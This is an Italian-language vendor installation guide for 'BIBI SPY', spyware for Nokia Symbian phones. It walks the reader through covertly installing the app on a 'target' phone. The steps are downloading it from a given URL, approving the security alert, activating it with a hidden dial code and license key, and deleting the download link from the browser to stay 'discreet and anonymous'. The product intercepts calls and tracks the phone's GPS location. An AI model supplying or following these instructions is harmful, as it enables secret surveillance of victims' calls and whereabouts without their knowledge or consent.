NOKIA – PASSO 1 – PREPARIAMOCI

Dovrai avere il telefono su cui installare BIBI SPY a portata di mano per procedere con l’installazione. Questo telefono dovrà avere attivo il Wi-Fi, GPRS o connessione 3G. L’intercettazione delle chiamate, richiede che il telefono bersaglio abbia la capacità di fare conference call. Per la localizzazione, il GPS dev’essere lasciato attivo. Una volta controllato che tutto sia a norma-

PASSO 2 – CI SIAMO QUASI

Vai al pannello di controllo cliccando su “Accesso” in alto a questo sito e cerca la voce “INACTIVE”. Dove compare la voce “License Key” apparirà un codice: annotalo da qualche parte, ti servirà durante l’installazione. Di seguito un esempio:

N01

PASSO 3 – INSTALLAZIONE E ATTIVAZIONE

Tutte queste operazioni sono da eseguire sullo smartphone bersaglio. Per questo esempio, abbiamo usato Symbian Belle.
1. Prendi il telefono e apri il browser web.
2. Inserisci l’URL “http://dmw.cc/d” nel browser del telefono. Se il telefono viene individuato, vai al passo 4, altrimenti vai al passo 3.

N02

3. Clicca Symbian.
4. Clicca “OK” quando viene proposto l’avvio del download.
5. Clicca “OK” quando viene richiesto di installare l’applicazione.
6. Clicca “Si” quando l’allarme di sicurezza appare sullo schermo.
7. Quando richiesto, seleziona “Memoria” come target di installazione.

N03

8. Adesso il software verrà installato. Se il processo non dovesse partire o è lento, controlla la connessione dati dello smartphone.
9. Nota: se dovessi avere aperte altre applicazioni, riceverai il seguente messaggio. Clicca “OK” per chiudere l’applicazione e installare il tutto.

N04

10. Una volta fatto, leggerai “Installazione completata” sullo schermo e tornerai al browser web. Chiudi il browser del telefono su cui stai installando BIBI SPY e clicca sul pulsante “Chiama”.
11. Adesso, inserisci il numero *#900900900 e premi il bottone di chiamata.

N06

12. Il programma si aprirà. Clicca l’icona del menù in basso a destra e attiva il software.
13. Dal menù che apparirà clicca “Attiva prodotto”.
14. Inserisci il codice di licenza nella sezione preposta e clicca “Attiva”.
15. Il processo di attivazione inizierà. Se dovesse metterci troppo tempo, controlla la connessione internet. Il processo di attivazione non funzionerà senza connessione Wifi, GPRS o 3G.

N08

A questo punto, dovrebbe apparire una schermata di avvenuto successo. Questo vorrà dire che il software è stato correttamente installato e pronto ad essere configurato. Per rimanere discreto e anonimo, rimuovi il link di download (http://dmw.cc/d) dal browser web del telefono su cui hai installato BIBI SPY.

Hai completato il processo di installazione!